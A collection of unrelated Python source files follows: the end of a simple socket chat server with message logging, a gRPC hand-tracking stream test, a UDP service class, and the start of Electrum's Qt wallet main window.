newFile = "jkkasgjasg76666AJHAHAHxxxxCf"+"+"+"[Room] "+sender + " has sent '"+filename+"'."
broadcast(bytes(newFile, "utf8"))
else:
broadcast(msg, name+": ")
except:
try:
client.close()
users.remove(name)
del clients[client]
msg = name +" left the chat."+"+"
leftlog = current_time +" >>>>>"+name + " left the chat." + "<<<<<"
with open("LOGS.txt","a") as output: # Sunucudan ayrılınca LOGS.txt dosyasına kayıt alır.
output.write(leftlog + '\n')
output.close()
msg = msg + name
broadcast(bytes(msg, "utf8"))
break
except KeyError:
break
else:
msg = name +" left the chat."+"+"
leftlog1 = current_time +" >>>>>" +name + " left the chat." + "<<<<<"
with open("LOGS.txt","a") as output: # Sunucudan ayrılınca LOGS.txt dosyasına kayıt alır.
output.write(leftlog1 + '\n')
output.close()
msg = msg + name
try:
del clients[client]
except KeyError:
break
broadcast(bytes(msg, "utf8"))
users.remove(name)
break
if msg != bytes("1J731JSG81jags881952kdpiSf18shj-123aasgxXAGa11_sfgCCCXXzzzz", "utf8"):
msglog = msg.decode("utf8").rstrip()
namelog = name
message_log = current_time +" " +namelog + ": " + msglog
with open("LOGS.txt","a") as output: # Gönderilen bütün mesajları LOGS.txt dosyasına kaydeder.
output.write(message_log + '\n')
def announcements(client): # keep-alive function written to avoid connection timeouts. Do not modify.
while True:
try:
time.sleep(120)
timeoutProtect = "1J731JSG81jags881952kdpiSf18shj-123aasgxXAGa11_sfgCCCXXzzzz"
client.send(bytes(timeoutProtect, "utf8"))
time.sleep(120)
except OSError:
pass
def broadcast(msg, prefix=""): # Function that forwards messages to all clients.
for sock in clients:
sock.send(bytes(prefix, "utf8")+msg)
users = []
clients = {}
addresses = {}
with open("port.txt", 'r') as f: # port.txt dosyasından portu alır.
portstr = f.readline().strip()
HOST = '127.0.0.1' # Enter your SSH server's IP address here.
PORT = int(portstr)
BUFSIZ = 1024
ADDR = (HOST, PORT)
SERVER = socket.socket(family = socket.AF_INET, type = socket.SOCK_STREAM, proto = 0)
SERVER.bind(ADDR)
if __name__ == "__main__": # console output below. Avoid changing anything other than the print statements.
SERVER.listen(5)
print(Fore.GREEN + "Server Started!")
print(Fore.GREEN + "Clients now can connect.")
print(Fore.GREEN + "Listening...\n")
ACCEPT_THREAD = Thread(target=accept_incoming_connections)
ACCEPT_THREAD.start()
ACCEPT_THREAD.join()
SERVER.close()
|
test_hand_tracking.py
|
import threading
import grpc
from proto.mediapipe.framework.formats import landmark_pb2
from proto.qoin.proto import hand_tracking_pb2_grpc, hand_tracking_pb2
from tests import ServerTestCase
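# test_bypass starts one client thread that pushes NormalizedLandmarkList
# messages once should_send flips to True, plus one pull thread per server
# worker. Each pull stream sets its event when it receives a forwarded frame;
# the test then expects every puller except the last one to have been served,
# presumably because the long-lived push stream occupies one of the limited
# gRPC worker threads.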
class TestHandTracking(ServerTestCase):
def test_bypass(self):
stub = hand_tracking_pb2_grpc.HandTrackingStub(self.channel)
should_send = False
def push():
def request_generator():
while True:
if should_send:
landmarks = [landmark_pb2.NormalizedLandmark(x=0, y=0, z=0)]
landmark_list = landmark_pb2.NormalizedLandmarkList(landmark=landmarks)
yield hand_tracking_pb2.HandTrackingPushRequest(landmark_list=landmark_list)
try:
stub.HandTrackingPushStream(request_generator())
except grpc._channel._InactiveRpcError: # noqa
pass
threading.Thread(target=push).start()
def pull(_self, stream_event):
res = stub.HandTrackingPullStream(hand_tracking_pb2.HandTrackingPullRequest())
try:
for _ in res:
stream_event.set()
except grpc._channel._MultiThreadedRendezvous: # noqa
pass
events = list()
for i in range(self.workers):
event = threading.Event()
threading.Thread(target=pull, args=(self, event)).start()
events.append(event)
for event in events:
self.assertFalse(event.is_set())
should_send = True
for event in events:
event.wait(1)
for event in events[:-1]:
self.assertTrue(event.is_set())
self.assertFalse(events[-1].is_set())
self.channel.close()
|
UdpService.py
|
from __future__ import annotations
from logging import getLogger
from math import inf
from socket import AF_INET, SOCK_DGRAM
from threading import Thread
from typing import Optional, Tuple
from ..clock import IClock
from ..constants import buffer_size
from ..log.util import log_method_call
from ..receive import IReceiveListener
from ..service import IService, IServiceManager
from ..socket_ import ISocket, ISocketFactory
from ..unreliable import IUnreliableOsErrorListener, IUnreliableReceiveListener, IUnreliableReceiveSendService
from ..util import checking
from ..util.ConnectionDetails import ConnectionDetails
from ..util.Listeners import Listeners
from ..util.Placeholder import Placeholder
class UdpService(IService, IUnreliableReceiveSendService):
def __init__(
self,
clock: IClock,
is_server: bool,
server_address: Placeholder[Tuple[str, int]],
service_manager: IServiceManager,
socket_factory: ISocketFactory,
unreliable_timeout_seconds: float = inf,
) -> None:
logger = getLogger(__name__)
self.clock = clock
self.is_server = is_server
self.os_error_listeners: Listeners[IUnreliableOsErrorListener] = Listeners()
self.receiver_address: Optional[Tuple[str, int]] = None
self.last_received_seconds = -inf
self.received_listeners: Listeners[IReceiveListener] = Listeners()
self.server_address = server_address
self.service_manager = service_manager
self.should_run = True
self.socket: Placeholder[ISocket] = Placeholder()
self.socket_factory = socket_factory
self.thread = Thread(target=log_method_call(logger, self.run))
self.unreliable_received_listeners: Listeners[IUnreliableReceiveListener] = Listeners()
self.unreliable_timeout_seconds = unreliable_timeout_seconds
service_manager.add_service(self)
def add_unreliable_os_error_listener(self, listener: IUnreliableOsErrorListener) -> UdpService:
self.os_error_listeners.add_listener(listener)
return self
def add_receive_listener(self, listener: IReceiveListener) -> UdpService:
self.received_listeners.add_listener(listener)
return self
def add_unreliable_receive_listener(
self,
listener: IUnreliableReceiveListener
) -> UdpService:
self.unreliable_received_listeners.add_listener(listener)
return self
def get_service_name(self) -> str:
return __name__
def join_service(self, timeout_seconds: Optional[float] = None) -> bool:
self.thread.join(timeout_seconds)
return self.thread.is_alive()
def run(self) -> None:
with self.socket.set(self.socket_factory.socket(AF_INET, SOCK_DGRAM)) as socket:
server_address = self.server_address.get_eventually(self.service_manager).get_blocking()
if server_address is None:
return
if self.is_server:
socket.bind(server_address)
else:
self.receiver_address = server_address
while self.should_run:
try:
(message, receiver_address) = socket.recvfrom(buffer_size)
if receiver_address is None:
break
self.last_received_seconds = self.clock.get_seconds()
connection_details = ConnectionDetails(socket.getsockname(), receiver_address)
self.receiver_address = receiver_address
self.received_listeners.for_each(
lambda listener: listener.on_receive(message, connection_details))
self.unreliable_received_listeners.for_each(
lambda listener: listener.on_unreliable_receive(message, connection_details))
except OSError as os_error:
self.os_error_listeners.for_each(
lambda listener: listener.on_unreliable_os_error(os_error))
def send(self, message: bytes) -> None:
checking.check_message_length(len(message))
receiver_address = self.receiver_address
if receiver_address is None:
return
if self.last_received_seconds + self.unreliable_timeout_seconds < self.clock.get_seconds():
return
socket = self.socket.get_optional()
if socket is not None:
socket.sendto(message, receiver_address)
def start_service(self) -> None:
self.thread.start()
def stop_service(self) -> None:
self.should_run = False
socket = self.socket.get_optional_and_clear()
if socket is not None:
socket.shutdown_guaranteed()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
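# Usage sketch (hypothetical method name): a wrapped method receives the
# password as a keyword argument,
#   @protected
#   def do_sign(self, tx, password):
#       ...
# so callers simply invoke self.do_sign(tx); the decorator prompts when the
# keystore is encrypted, passes None for an unencrypted wallet, and returns
# without calling the method if the user cancels the dialog.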
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
        self.history_list.setFocus()
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
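    # Hedged usage sketch: code that opens a window which may itself spawn
    # prompts (e.g. hardware-wallet PIN dialogs) brackets it with push/pop so
    # those prompts get parented to the right window:
    #
    #     self.push_top_level_window(dialog)
    #     try:
    #         dialog.exec_()
    #     finally:
    #         self.pop_top_level_window(dialog)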
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
            t.daemon = True  # daemonize so the alias lookup never blocks interpreter shutdown
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
        # Once the GUI has been initialized, check whether there is anything to
        # announce: callbacks may already have fired before the GUI existed.
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
        dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.lnworker and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
try:
new_path = self.wallet.save_backup()
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
if new_path:
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
else:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not created"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
            sorted(recent)  # sanity check: raises if the stored value is not a sortable list
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
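            # `loader` exists to bind `k` by value; a bare lambda here would
            # capture the loop variable by reference, and every menu entry
            # would end up opening the last wallet in the list.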
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
